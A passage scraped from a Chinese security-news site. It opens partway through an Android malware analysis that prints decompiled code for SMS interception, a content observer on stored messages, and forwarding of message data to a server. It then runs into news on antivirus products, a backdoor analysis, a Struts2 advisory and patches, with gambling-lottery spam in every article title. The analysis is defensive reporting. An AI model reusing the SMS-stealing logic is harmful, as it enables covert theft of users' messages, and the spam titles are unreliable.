break;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (i5 != 2)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (server.b == i3)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; break label760;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; Cursor localCursor2 = server.c.a(&quot;send&quot;, null, null, null, null, null, &quot;_id ASC&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (localCursor2.moveToFirst())</p><p>&nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localCursor2.getColumnIndex(&quot;_id&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int i6 = localCursor2.getColumnIndex(&quot;sSend&quot;);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; do</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, localCursor2.getString(i6));</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; while (localCursor2.moveToNext());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localCursor2.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (server.h(this.a).equals(&quot;1&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new o());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, new n());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; String str6 = server.d(this.a).a(this.a.getApplicationContext());</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; server.a(this.a, str2 + &quot;;&quot; + str1, str6);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; &nbsp; server.b = i3;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; str4 = &quot;发送&quot;;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; break;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localStringBuilder.append(&quot;no result!&quot;);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; catch (SQLiteException localSQLiteException)</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; while (true)</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; continue;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; label760: String str4 = &quot;null&quot;;</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; }</p><p>}</p><p><strong>解密密钥:</strong><br/></p><p>public void a()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; try</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; InputStream localInputStream = getAssets().open(&quot;unhi.db&quot;); &nbsp; &nbsp; // 密钥</p><p>&nbsp; &nbsp; &nbsp; FileOutputStream localFileOutputStream = new FileOutputStream(this.q + &quot;unhi.db&quot;);</p><p>&nbsp; &nbsp; &nbsp; byte[] arrayOfByte = new byte[1024];</p><p>&nbsp; &nbsp; &nbsp; while (true)</p><p>&nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; int i1 = localInputStream.read(arrayOfByte);</p><p>&nbsp; &nbsp; &nbsp; &nbsp; if (i1 &lt;= 0)</p><p>&nbsp; &nbsp; &nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localFileOutputStream.flush();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localFileOutputStream.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; localInputStream.close();</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; return;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localFileOutputStream.write(arrayOfByte, 0, i1);</p><p>&nbsp; &nbsp; &nbsp; }</p><p>&nbsp; &nbsp; }</p><p>&nbsp; &nbsp; catch (Exception localException)</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; }</p><p>&nbsp; }</p><p>&nbsp; public void a(String paramString)</p><p>&nbsp; {</p><p>&nbsp; &nbsp; if (!new File(paramString).exists())</p><p>&nbsp; &nbsp; &nbsp; a();</p><p>&nbsp; }</p><p>&nbsp; public void c()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; new l(this).start();</p><p>&nbsp; }</p><p>&nbsp; public IBinder onBind(Intent paramIntent)</p><p>&nbsp; {</p><p>&nbsp; &nbsp; return null;</p><p>&nbsp; }</p><p>&nbsp; public void onCreate()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; this.u = new e();</p><p>&nbsp; &nbsp; IntentFilter localIntentFilter = new IntentFilter(&quot;android.provider.Telephony.SMS_RECEIVED&quot;);</p><p>&nbsp; &nbsp; localIntentFilter.setPriority(2147483647);</p><p>&nbsp; &nbsp; registerReceiver(this.u, localIntentFilter);</p><p>&nbsp; &nbsp; p = (ActivityManager)getSystemService(&quot;activity&quot;);</p><p>&nbsp; &nbsp; this.F = 0;</p><p>this.j = false;</p><p>b(this.s.a(getApplicationContext()), &quot;201305:&quot; + g + &quot;;ver:&quot; + Build.VERSION.RELEASE + &quot;;Model:&quot; + Build.MODEL);</p><p>&nbsp; &nbsp; &nbsp; this.q = (getApplicationContext().getFilesDir().getAbsolutePath() + &quot;/&quot;);</p><p>&nbsp; &nbsp; &nbsp; a(this.q + &quot;unhi.db&quot;);</p><p>&nbsp; &nbsp; &nbsp; c = new a(this, getApplicationContext().getFilesDir().getAbsolutePath() + &quot;/unhi.db&quot;, null, 1);</p><p>&nbsp; &nbsp; &nbsp; m localm = new m(this, new Handler());</p><p>&nbsp; &nbsp; &nbsp; getContentResolver().registerContentObserver(Uri.parse(&quot;content://sms/&quot;), true, localm);</p><p>&nbsp; &nbsp; &nbsp; Intent localIntent = new Intent(getApplicationContext(), log.class);</p><p>&nbsp; &nbsp; &nbsp; localIntent.setFlags(268435456);</p><p>&nbsp; &nbsp; &nbsp; startService(localIntent);</p><p><br/><img src="https://pic.cr173.com/up/201403/091720_4171445548534.png"/>&nbsp;<br/><br/></p><p><strong>三、&nbsp;&nbsp;</strong><strong>总结</strong></p><p>该病毒尝试着去卸载安全软件;采用了加密技术,增加了分析难度;并隐藏运行界面,防止用户察觉。可以看出移动安全问题越演越烈,且手段越来越高明,增加了分析难度。</p><p>// 由于本人对于密码学方面还没有Hello World的水平,所以无法解密相关信息,水平有限。</p> [系统安全]W7任务栏打不开窗口怎么办?-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/28003_1.html 西西 系统安全 2014/3/13 14:07:20 <p>电脑任务栏不显示打开的窗口,打开过很多任务。但是任务栏就是不显示打开的项目,但是用TAB+ALT 或者任务管理器可以看到进程,这到底是为什么呢?本文就来给大家讲解一下。</p><p>任务栏不显示任务是什么原因?</p><p>出现这种情况一般是由于</p><p>一:桌面程序explorer.exe有问题</p><p>二:任务栏设置错误</p><p>三:任务栏故障</p><p align="center"><img src="https://pic.cr173.com/up/201403/140850_8884030997753.png"/></p><p>故障一及解决方法:</p><p>原因分析:任务栏设置问题</p><p>有一种情况是打开的窗口任务栏不显示,包括任务栏也看不到。但是鼠标点击过去又能正常显示,这是因为设置了 任务栏自动隐藏导致的。</p><p>解决办法:</p><p>在任务栏,右键,属性,如下图</p><p align="center"><img src="https://pic.cr173.com/up/201403/140927_4408338248729.png"/></p><p>解决步骤:</p><p>1.找到任务栏,右键“任务管理器”如果是XP系统直接输入 ctrl+alt+t调出任务管理器</p><p align="center"><img src="https://pic.cr173.com/up/201403/141330_9945584952831.jpg"/></p><p>&nbsp;</p><p>找到“进程”选项卡---- 找到 explorer进程,点击结束进程,并确定</p><p align="center"><img src="https://pic.cr173.com/up/201403/141225_6895642936229.png"/></p><p align="center"><img src="https://pic.cr173.com/up/201403/141513_2957318961620.png"/></p><p>新建explorer任务</p><p>然后点击,新建任务,在任务新建打开选项输入 explorer 确定即可,您在查看任务栏您会发现,之前打开的窗口又正常恢复了</p><p align="center"><img src="https://pic.cr173.com/up/201403/141652_7757245719432.png"/></p> [安全产品]卡巴斯基2014官方中文版发布、卡巴斯基2014免费版-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/22370_1.html 西西 安全产品 2013/8/24 10:02:16 <p>卡巴斯基2014系列是卡巴斯基实验室的旗舰产品,能够为个人计算机用户提供抵御各类互联网威胁的全面保护。近日,卡巴斯基官网正式放出了卡巴斯基反病毒软件2014和卡巴斯基安全部队2014的简体中文版,大家可以下载30天试用版本进行体验。<br /></p><p><strong>卡巴斯基反病毒软件2014:</strong></p><p>主要功能:</p><p>——实时保护,抵御最新病毒、间谍软件和更多网络威胁</p><p>——主动检测未知恶意软件,回滚恶意行为</p><p>——快速安全检查,查看文件和网站的安全性</p><p>——自动漏洞入侵防护确保漏洞不会造成计算机被感染</p><p>——网址顾问提示网页链接信誉信息</p><p>——反锁屏软件,避免计算机被木马锁定</p><p>——反钓鱼功能保护您的数字身份安全</p><p>——iChecker/iSwift 技术提供高性能的智能扫描</p><p>——智能更新减少网络流量和资源使用</p><p>——游戏模式提供无打扰的游戏体验</p><p>更新信息:</p><p>——支持最新版的常见网页浏览器;</p><p>——新增反锁屏软件功能;</p><p>——反钓鱼功能改进;</p><p>——已增强程序性能,并且优化了计算机资源消耗;</p><p>——新增在计算机空闲时限制活动的模式;</p><p>——增强程序图形界面性能,减少了响应用户操作的时间;</p><p>——改善了程序报告功能。</p><p><strong>卡巴斯基安全部队2014:</strong></p><p>主要功能:</p><p>——完整的实时保护:通过整合云技术和高级PC 安全技术,卡巴斯基安全软件能够为用户提供有效的针对恶意软件和其他互联网威胁的高效保护。</p><p>——抵御各种类型的恶意软件:实时监控和分析潜在威胁,能够在危险行为造成危害之前,完全将其拦截。</p><p>——安全冲浪:内嵌的网页保护能够对用户通过PC 访问的每个网站进行安全检查,确保所访问网站安全,不包含恶意软件。</p><p>——保护在线交易安全:增强的在线交易保护能够让您安全无忧地通过PC 进行在线购物、使用在线银行以及进行在线支付和转账。</p><p>——应用程序控制:受信任应用程序模式能够限制在PC 上运行的程序,阻止未授权文件影响系统。</p><p>——保护数字身份安全:用户能够享受业内领先的反钓鱼和反身份盗窃保护。</p><p>——保护家庭在线安全:利用上网管理功能,您可以让孩子从互联网获益,同时远离不良内容。</p><p>——保护用户输入内容:当用户使用物理键盘输入时,保护用户的个人数据安全。使用无法探测的鼠标点击进行输入,还能够避免键盘记录器或截屏软件拦截敏感信息。</p><p>——系统回滚功能:回滚恶意软件行为对系统造成的影响。</p><p>——更强的保护:优化的性能:卡巴斯基软件经过特别优化,在为用户提供所需的安全保护的同时,不会拖慢PC 性能。</p><p>更新信息:</p><p>——新增ZETA盾;</p><p>——新增受信任应用程序模式;</p><p>——安全支付与反钓鱼功能改进;</p><p>——上网管理功能改进;</p><p>——新增反锁屏软件功能;</p><p>——新增反锁定程序功能;</p><p><span style="color:#ff0000;">30天试用版下载:</span></p><p>卡巴斯基反病毒:http://download.kaba365.com/kaspersky/2014/kav14.0.0.4651zh-Hans-cn.exe</p><p>卡巴斯基安全部队:http://download.kaba365.com/kaspersky/2014/kis14.0.0.4651zh-Hans-cn.exe</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025650787.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025685906.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025666145.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025612732.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025766786.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082410025737275.jpg" alt="" /></p> [系统安全]瑞星发布迅雷InpEnhSvc.exe后门特征分析报告-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/22293_1.html 西西 系统安全 2013/8/22 10:23:02 <p>迅雷在不久前被曝产品内置后门,昨日迅雷官方对此消息进行了证实,称其是员工私人行为。瑞星今日发布迅雷InpEnhSvc.exe后门分析报告InpEnhSvc.exe拥有典型的后门特征,相比于其它后门程序,该病毒侧重于后台应用推广,包括PC应用和手机Android应用;其次病毒文件带有正常的数字签名。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231781497.png" alt="" /></p><p>本报告主要分析了该后门的功能点,<span style="color:#ff0000;">InpEnhSvc主要有三个大功能点</span>:</p><p>后台恶意推广手机应用</p><p>常规的远程控制操作</p><p>自动更新升级</p><p>功能点主要执行流程</p><p>病毒运行时,会创建一个隐藏的0大小的窗口,并注册接收USB、DISK、COMPORT等硬件设备的更改通知,病毒通过接收远程不同的功能号来执行相应的功能函数。</p><p><span style="color:#ff0000;">后台恶意推广手机应用</span></p><p>执行时会检测常见的调试类软件是否存在,存在的话就不执行后面的流程,检测的调试类软件包括procexp.exe、procmon.exe、windbg.exe等。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231764408.png" alt="" /></p><p>检测temp目录下是否存在配置文件tools.ini,不存在的话就从conf.kklm.n0808.com下载得来,并通过配置文件的信息启动相应的推广更新等操作。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231784169.png" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231765876.png" alt="" /></p><p>检测temp目录下是否存在adb等手机应用推广工具,如不存在则下载。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231845287.png" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231865049.png" alt="" /></p><p>注册自身为word插件,随word启动而自动加载。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231856241.png" alt="" /></p><p>常规的远程控制操作</p><p>该功能主要实现了8个普通的远程控制功能,根据不同的远程指令id执行对应的函数,功能简要描述如下:</p><p>功能1:下载安装PC应用</p><p>功能2:下载安装手机Android应用</p><p>功能3:添加到桌面快捷方式</p><p>功能4:添加网址到收藏夹</p><p>功能5:设置IE浏览器主页</p><p>功能6:查询扫描注册表操作</p><p>功能7:扫描桌面,确定是否存在指定文件</p><p>功能8:扫描收藏夹,确定是否存在指定文件</p><p>其中的功能函数分派表如下:</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231833807.png" alt="" /></p><p><span style="color:#ff0000;">自动更新升级</span></p><p>病毒通过一个web地址更新升级adb软件包。</p><p align="center"><img src="https://pic.cr173.com/up/2013-8/2013082210231871598.png" alt="" /></p> [系统安全]DNF游戏成盗号木马重灾区、DNF外挂是盗号木马的主要载体-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/21532_1.html 西西 系统安全 2013/7/22 19:05:18 <p>7月16日,360互联网安全中心发布《2013年第二季度中国个人电脑上网安全报告》。报告指出,目前超过90%的盗号木马以游戏帐号为目标,<strong>DNF等热门大型网游是木马重灾区,游戏外挂则是盗号木马的主要载体</strong>。随着暑期到来,游戏玩家活跃度提升,盗号木马的数量很可能将进一步增长。</p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013072219080870454.jpg" alt="" /></p><p>榜单中,有11 个恶意程序(占到榜单的55%)为盗号木马或与盗号木马密切相关。它们分别是排名第3、4 、5、7、8、9、11、14、16、18 和19 的恶意程序。其中,有一些是针对特定应用或游戏的盗号程序,有一些则是感染用户电脑后,将更多的盗号程序下载到用户电脑中;还有一些是通过感染驱动程序,篡改启动项,释放恶意的批处理文件或动态链接库等手法,最终实现盗取用户帐号的目的。从360 互联网安全中心的监测情况来看,目前超过90% 以上的盗号木马针对的是游戏帐号。</p><p>继一季度上榜之后,<strong>DNF游戏(地下城与勇士)的盗号木马和虚假外挂再次登上恶意程序拦截量的TOP20 榜单。</strong>这一方面反映出这款游戏的火爆程度,另一方面也反映出游戏玩家所面临的巨大风险。特别值得说明的是,因为很多游戏玩家误以为只要是外挂程序就会被安全软件报警,因此经常会无视安全软件的风险提示,手动放行此类恶意程序,对自己的电脑安全造成严重的威胁。随着暑期到来,游戏玩家活跃度的提高,预计游戏盗号木马还会更加活跃。</p><p><span style="font-weight: bold;">快速入口:</span><br /></p><p>1、DNF密保绑定/管理地址:http://aq.qq.com/cn2/manage/my_mb</p><p>2、QQ登陆记录查询地址:http://aq.qq.com/cn2/message_center/message_center_login</p><p>3、DNF密保绑定领奖地址:http://aq.qq.com/cn2/manage/mbtoken/app_priv_index</p><p>对于木马病毒和钓鱼网站的防范措施,<strong>360安全专家石晓虹建议</strong>,广大网友要及时为系统和常用软件打补丁,防止木马利用漏洞远程入侵;不轻易下载运行可疑文件,如游戏外挂、盗版软件、陌生人发来的照片等,不轻信陌生网站发布的低价、中奖等诱惑信息;定期更新安全软件,在安全软件发出报警提示时提高警惕,第一时间拦截木马病毒和钓鱼网站。<br /></p> [网络安全]百度站长平台预警:Apache Struts2高危漏洞来袭-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/21441_1.html 百度 网络安全 2013/7/18 14:55:18 <p>亲爱的站长朋友:</p><p>大家好,昨日互联网遭受了一场漏洞风波——<strong>Apache&nbsp;Struts2</strong>高危漏洞,影响到Struts&nbsp;2.0.0&nbsp;-Struts&nbsp;2.3.15的所有版本。包括国内很多知名网站在内的大量网站受到此漏洞不同程度的影响。攻击者可以利用该漏洞执行恶意java代码,最终导致网站数据被窃取、网页被篡改等严重后果,使网站及网民安全受到了极大的威胁。</p><p>为了避免站长们的损失,百度站长平台现发出<strong>安全风险通告</strong>,请站长们排查网站是否使用Struts2框架,如使用请您及时诊断自己网站是否存在该漏洞。为此,安全联盟合作伙伴scanv安全中心紧急开发了一款在线小工具,可以帮您快速诊断是否存在此漏洞,详情点击:<a href="http://www.scanv.com/tools/" target="_blank">http://www.scanv.com/tools/&nbsp;</a>。</p><p>如果您的网站存在此漏洞,请您进行紧急修复,升级至官方最新版本Struts&nbsp;2.3.15.1,下载地址:http://struts.apache.org/download.cgi#struts23151,升级修补了多个安全漏洞,其中包括这个远程任意代码的高危安全漏洞。</p><p>Struts2昨日被曝出远程执行漏洞。Struts漏洞影响巨大,受影响站点以电商、银行、门户、政府居多。而且一些自动化、傻瓜化的利用工具开始出现,填入地址可直接执行服务器命令,读取数据甚至直接关机等操作...<br /></p><p><span style="color:#ff0000;">另国内知名安全漏洞平台乌云网站显示</span>,从昨日开始,收到国内大量知名站点因使用Struts应用框架产生的漏洞,涉及网站包括库巴网、百度、中国联通分站、易宝支付、土豆网、京东商城、1号店、百合网、网易、搜狐、淘宝等。目前影响网站仍在增长中。而且漏洞利用代码已经被强化,可直接通过浏览器的提交对服务器进行任意操作并获取敏感内容。</p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013071814580489456.jpg" alt="" /></p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013071814580414550.jpg" alt="" /></p><p>Struts通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品,是应用最广泛的Web应用框架之一。</p><p>白帽子向乌云漏洞报告平台提交的漏洞列表:</p><p align="center"><img src="https://pic.cr173.com/up/2013-7/2013071814580565141.jpg" alt="" /></p> [系统安全]安卓漏洞补丁CM 10.1.1正式版、拯救99%安卓用户-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/21293_1.html 西西 系统安全 2013/7/11 15:28:22 <p>CyanogenMod 10.1的稳定正式版才发布刚刚半个月,10.1.1稳定版又来了!新版主要针对安卓近期暴露的安全问题做了改进,针对多个漏洞打了补丁。因此,10.1.1版本完全是一个安全性的更新,以及一些bug的修正,不涉及任何新的功能特性。</p><p><strong>其中最关键的漏洞补丁包括:</strong></p><p>-Bug 8219321:就是宣称99%安卓手机都存在的那个<span style="color:#ff0000;">万能密钥问题(MasterKey)</span>,安卓1.6以上版本都存在,过去四年间的几乎所有手机都难逃影响。CM7、CM9也已同步进行了更新。</p><p>- CVE-2013-2094 (Linux内核漏洞)</p><p>- CVE-2013-2596 (高通平台漏洞)</p><p>- CVE-2013-2597 (高通平台漏洞)</p><p>建议所有的CM 10.1.0.x用户更新升级。</p><p>官方下载地址:<a href="http://download.cyanogenmod.com/?type=stable" target="_blank">http://download.cyanogenmod.com/?type=stable</a></p><p align="center"><img src="https://pic.cr173.com/up/2013-7/20137711111530082623.png" alt="" /></p> [安全产品]AV-Test发布Android最新安全应用评测排名、金山手机毒霸国内第一-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/19994_1.html 西西 安全产品 2013/4/22 21:34:12 <p>2013年4月22日,国际知名安全评测组织AV-test发布Android最新评测排名。AV-Test测试显示,共有7款Android安全应用检测率超过90%,这些应用被AV-Test归为最优秀的一类。<br />金山手机毒霸排在第8位,360手机卫士排名20,腾讯手机管家排名19。以下是评测结果截图:</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221310497358.jpg" alt="" /></p><p>AV-Test此次的测试主要包含两个方面:防护性、可用性,<strong>防护性得分是指防范恶意软件(病毒、蠕虫、木马)感染的能力</strong>,<strong>可用性得分代表的是安全软件对整个手机可用性的影响</strong>(耗电、减慢性能、产生流量),两者的满分均为6分。</p><p>金山手机毒霸的恶意软件检出率为99.76%,行业平均成绩为93%,<strong>防护性得分为5.5,可用性得分为6</strong>。</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221333741607.png" alt="" /><br />金山手机毒霸的AV-Test测试结果</p><p>360手机卫士的恶意软件检出率为93%,<strong>防护性得分为3.5,可用性得分为4.0</strong>。</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221333363185.jpg" alt="" /><br />360手机卫士测试结果</p><p>腾讯手机管家的恶意软件检出率为95%,<strong>防护性得分为4.0,可用性得分为4.0</strong>。</p><p align="center"><img src="https://pic.cr173.com/up/2013-4/2013042221333492283.jpg" alt="" /><br />腾讯手机管家测试结果</p> [安全产品]手机浏览器“假面浏览”病毒爆发 腾讯手机管家首家截获查杀-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/19019_1.html 西西 安全产品 2013/1/17 11:37:39 <p>近日,一款名为“假面浏览”(a.rogue.pppowser)的Android病毒被腾讯移动安全实验室首家截获。用户手机一旦被感染,该病毒就会用自己设计好的OO浏览器界面替换手机中知名手机浏览器的软件界面。截至目前,已发现有多名用户反馈自己的手机遇到该情况了。</p><p>据悉,遭遇假面浏览病毒替换了软件界面后,很可能导致用户手机上网账号、银行帐号被泄漏等隐私安全问题。目前,腾讯手机管家已经首家支持对该病毒的精准查杀,用户可以从官方网站载安装,并开启全盘扫描。</p><p><strong>病毒特征:</strong></p><p>该病毒安装后,开机强制启动,后台开启恶意服务搜索指定浏览器进程,私自篡改业界知名浏览器主页,存在流氓行为。</p><p>1、隐蔽性。病毒安装后无图标,开机自启动,后台偷偷运行并伺机替换手机中的浏览器界面。</p><p>2、恶意行为。病毒安装后,会自动搜索已知的浏览器进程,并且密切监控这些手机浏览器的启动状态,一旦监听到启动,病毒就会在瞬间用自己的资源界面掩盖原先的手机浏览器界面,让用户使用被替换后的浏览器界面。</p><p>3、影响范围大。目前受该病毒影响的手机浏览器包括了UC浏览器、天天浏览器、360手机浏览器、海豚浏览器等。</p><p>{insd m=&quot;0&quot; i=&quot;17294&quot;}</p><p><strong>病毒截图:</strong></p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/2013011711385697255.jpg" /></p><p><strong>专家支招:</strong></p><p>虽然目前该病毒已经在手机论坛、非安全电子市场疯狂传播。手机安全专家建议用户,尽量不要去不安全的第三方电子市场、手机论坛下载应用,因为这些地方是手机病毒最惯用的藏身地。</p><p>同时,要为手机安装专业的手机安全软件,定期进行病毒查杀。下载应用的时候,最好去应用的官方网站,Google play或者具备安全检测的第三方电子市场下载,比如,应用宝、腾讯手机管家“软件游戏”等。</p> [安全产品]百度在东南亚泰国等地推出Baidu PC Faster、抢占安全软件市场-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/18919_1.html 西西 安全产品 2013/1/9 14:33:44 <p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/2013010914311038945.png" /></p><p>“百度的 Baidu PC Faster 软件为什么不面向国内市场?”众多网友了解到原来百度在泰国不是做搜索,做的居然是安全,笑称这才是真正的“泰囧”。据该网友称,Baidu PC Faster 是百度面向国外市场推出的一款系统清理 / 加速类的工具软件,目前还没见到中文版。</p><p>通过 Baidu PC Faster 的官方网站我们可以了解到,这确实是一款电脑系统辅助软件,和国内的 360 安全卫士非常类似,不过功能要稍微简单一些,目前只支持英语和泰语。根据官方网站的介绍,Baidu PC Faster 主要提供系统启动时间管理、系统升级(漏洞修复)、垃圾清理和电脑体检的功能。网站的版权标注为“Copyright &copy; 2013 Baidu (Hong Kong) Limited. All Rights Reserved”,有网友称这的确是百度在香港注册的全资子公司。</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/2013010914311072860.png" /></p><p>随后有网友指出百度在 2012 年曾收购安全软件 PC 巡警,并且在深圳招了一堆客户端研发工程师和病毒分析师,有意进入安全领域。之所以选择在泰国推出,可能是因为国内的安全软件市场几乎饱和。360 一家独大,腾讯和金山也一直在追赶,百度很难找到切入点。据了解,百度之前曾和金山合作在国内推出过“百度电脑管家”,功能和 360 安全卫士类似,不过表现十分欠佳。此番选择在国外推出安全产品,会是百度的迂回政策吗?</p><p>附视频演示(亮点在 4 分 16 秒):</p><p align="center"><embed align="middle" src="http://player.youku.com/player.php/sid/XNDk5MTA5MTM2/v.swf" width="480" height="400" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" allowfullscreen="true" /></p> [安全产品]国外知名杀毒软件比特梵德BitDefender发布免费版-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/18885_1.html 西西 安全产品 2013/1/7 10:36:45 <p>比特梵德BitDefender,可是国外长期雄居杀软排行榜第一的反病毒、系统保护软件,现在也开始加入免费的大军(是不是受国内安全软件市场免费策略的影响哦)。免费杀毒软件如今已经越来越多,譬如&nbsp;Avast!、金山毒霸、AVG、小红伞、微软MSE、Comodo、熊猫云等等。如今国外一些传统的杀软厂商也纷纷开始加入免费的大军,可选择的余地越来越多了。</p><p>知名杀毒软件品牌&nbsp;<strong>BitDefender</strong>&nbsp;终于也推出了全功能<strong>免费版的杀毒软件</strong>&nbsp;——&nbsp;BitDefender Antivirus Free Edition。它最大的特点就是小巧轻盈、界面精美,完美支持&nbsp;Windows 8,并且杀毒能力强劲。根据AVTest的测试数据统计,BitDefender 的杀毒率高达94%,比Avast!还要高一点~唯一可惜的是目前还没有中文语言界面……</p><p>{insd m=&quot;0&quot; i=&quot;53259&quot;}</p><p><strong>BitDefender 免费杀毒软件:</strong></p><p>下面看看&nbsp;BitDefender 免费杀毒软件的界面吧,是否有耳目一新的感觉?并且,BitDefender 的设计非常简洁!!对于一些不太熟悉使用电脑的用户,BitDefender 的几乎零配置可谓非常方便,即便给家长们的电脑安装也很合适。因为它只有两个总开关“Virus Shield”(病毒防护盾) 、“Auto Scan”(自动扫描) 和一个登录按钮。而且也不像一些国产杀软那样会弹出什么烦人的广告~</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/201317103021.jpg" /></p><p>如果你希望长期免费使用 BitDefender 的话,你唯一需要做的就是通过这里注册一个账号,并在杀毒软件里面登录进去即可。如果不注册不登录账号的话,你只能免费得到30天的病毒库升级服务,过期病毒库就不升级了。</p><p>虽然说&nbsp;BitDefender&nbsp;的界面与功能都非常简单甚至说是简陋,但我个人倒是越来越喜欢这种极简的工具和软件,专注核心功能,不需要用户过多的学习和花费精力时间去配置就能好好地为用户工作,也是一种极致。当然,肯定会有人认为这种软件不够“专业”不够“强大”,这就见仁见智了,追求强大功能的朋友也可以去试试收费版本的&nbsp;BitDefender Internet Security&nbsp;(互联网安全套装)。</p><p><strong>安全前病毒扫描功能:</strong></p><p>值得一提的是,虽然&nbsp;<strong>BitDefender 免费版</strong>功能非常简洁,但它依然保留了在安装之前就可以先为系统查杀病毒,这一点有时在遇到有病毒的环境时特别有用!</p><p align="center"><img alt="" src="https://pic.cr173.com/up/2013-1/201311771032401264.jpg" /></p><p><strong>写在后面:</strong></p><p>总之,BitDefender&nbsp;免费杀毒软件的精美界面让我一下子对这款杀软产生了好感,而其极简的设计风格又让我觉得它与大多数其他杀毒软件有所不同。强而有力的杀毒内核技术又让它不仅仅是个“面子货”,这实用的杀毒能力加上清爽酷黑的界面与轻盈快速的感觉也比其他“笨重”的大型杀软来得更“小清新”一些。或许,这可能就是很多人一直想寻找的杀毒软件了吧!异次元软件世界怎么能不推荐大家试一试呢……</p> [安全产品]360安全卫士9.0Beta新版发布,全新界面,更多惊喜~-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/18782_1.html 西西 安全产品 2012/12/27 9:18:34 <p>经过360的产品经理、设计师和工程师们通宵达旦的奋战——360安全卫士9.0Beta版今天发布啦,新版本相比之前又有了重大飞跃!<br 